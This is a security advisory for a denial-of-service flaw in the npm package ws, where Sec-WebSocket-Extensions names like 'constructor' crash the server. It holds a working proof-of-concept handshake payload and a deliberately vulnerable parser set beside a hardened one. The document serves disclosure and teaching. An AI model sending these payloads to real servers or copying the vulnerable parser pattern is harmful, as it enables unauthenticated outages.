HIGH 7.5 npm
Denial of Service in ws
GHSA-5v72-xg48-5rpm
Published · Modified
Description
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names (for example `constructor` or `__proto__`) as extension or parameter names is sent. The server's header parser used plain objects as lookup tables, so such a name resolved to an inherited property instead of a missing entry and raised an uncaught exception that terminates the process. Any client that can open a TCP connection to the server can trigger this during the WebSocket handshake, with no authentication.
Proof of concept
```js
const WebSocket = require('ws');
const net = require('net');

// Start a ws server (an affected version, i.e. before 3.3.1) on port 3000
// and, once it is listening, open a raw TCP connection to it and send a
// hand-built WebSocket upgrade request.
const wss = new WebSocket.Server({ port: 3000 }, function () {
  // Any Object.prototype property name works as the extension name;
  // ',;constructor' is the advisory's alternative payload.
  const payload = 'constructor'; // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n' // after join() this yields the blank line that ends the header block
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume(); // discard whatever the server sends back
    socket.write(request);
  });
});
```
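To make the failure mode concrete without installing an affected ws release, here is an added example (not ws's own parser, which is a character-level state machine) of a simplified Sec-WebSocket-Extensions parser in two variants. `parseVulnerable` keeps extension and parameter names in plain object literals, so `constructor`, `__proto__` and similar names hit inherited properties and the parser throws a TypeError, exactly the class of uncaught exception the advisory describes. `parseHardened` uses prototype-less objects (`Object.create(null)`) as its lookup tables and validates names against the RFC 7230 token grammar, so those names become ordinary keys and malformed input is rejected with a SyntaxError that a handshake handler can map to a 400 instead of crashing. The split-based parsing, the `TOKEN` regex, the `outcome` helper and the `SAMPLES` list are assumptions made for this illustration; quoted-string parameter values are not handled.

```javascript
// Added example, not code from the ws project. Two variants of a simplified
// Sec-WebSocket-Extensions parser: one with the prototype-lookup bug, one
// hardened with prototype-less objects and token validation.

// RFC 7230 "token" characters; extension and parameter names must match.
// (Assumed check for this example; real ws validates differently.)
const TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

// Vulnerable variant: `{}` inherits from Object.prototype, so
// extensions['constructor'] is already the Object function before anything
// has been added, and calling .push on it throws a TypeError. The same
// happens for '__proto__', 'hasOwnProperty', 'toString', ...
function parseVulnerable(header) {
  const extensions = {};
  for (const ext of header.split(',')) {
    const [name, ...rawParams] = ext.split(';').map((s) => s.trim());
    const params = {};
    for (const p of rawParams) {
      const [key, value] = p.split('=').map((s) => s.trim());
      if (params[key] === undefined) params[key] = [];
      params[key].push(value === undefined ? true : value);
    }
    if (extensions[name] === undefined) extensions[name] = [];
    extensions[name].push(params);
  }
  return extensions;
}

// Hardened variant: Object.create(null) has no prototype, so 'constructor'
// is just another key and `in` only sees what the parser itself stored.
// Names are also checked against the token grammar, so garbage such as an
// empty extension name is rejected with a SyntaxError rather than crashing.
function parseHardened(header) {
  const extensions = Object.create(null);
  for (const ext of header.split(',')) {
    const [name, ...rawParams] = ext.split(';').map((s) => s.trim());
    if (!TOKEN.test(name)) {
      throw new SyntaxError(`invalid extension name: ${JSON.stringify(name)}`);
    }
    const params = Object.create(null);
    for (const p of rawParams) {
      const [key, value] = p.split('=').map((s) => s.trim());
      if (!TOKEN.test(key)) {
        throw new SyntaxError(`invalid parameter name: ${JSON.stringify(key)}`);
      }
      if (!(key in params)) params[key] = [];
      params[key].push(value === undefined ? true : value);
    }
    if (!(name in extensions)) extensions[name] = [];
    extensions[name].push(params);
  }
  return extensions;
}

// Classify a header the way a handshake handler would: 'ok' when it parses,
// 'rejected' for a SyntaxError (answer 400 and move on), 'crash' for any other
// exception escaping the parser (in an affected ws this took the process down).
function outcome(parse, header) {
  try {
    parse(header);
    return 'ok';
  } catch (err) {
    return err instanceof SyntaxError ? 'rejected' : 'crash';
  }
}

// Constructed sample headers: the advisory's two payloads, two more
// Object.prototype names, and a normal permessage-deflate offer.
const SAMPLES = [
  'constructor',
  ',;constructor',
  '__proto__',
  'hasOwnProperty',
  'permessage-deflate; client_max_window_bits',
];

for (const h of SAMPLES) {
  console.log(
    JSON.stringify(h).padEnd(46),
    'vulnerable:', outcome(parseVulnerable, h).padEnd(9),
    'hardened:', outcome(parseHardened, h)
  );
}
```

Run it with `node` and the table shows every prototype name crashing the vulnerable parser while the hardened one either parses it as a harmless unknown extension (which the server then simply does not negotiate) or rejects the malformed `,;constructor` form. The general lesson carries beyond ws: any JavaScript lookup table keyed by attacker-controlled strings needs `Object.create(null)`, a `Map`, or an own-property check before the key is used.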
Recommendation
Update to version 3.3.1 or later.
References
- WEB https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
- WEB https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407
- WEB https://snyk.io/vuln/npm:ws:20171108
- WEB https://www.npmjs.com/advisories/550
- WEB https://www.npmjs.com/advisories/550/versions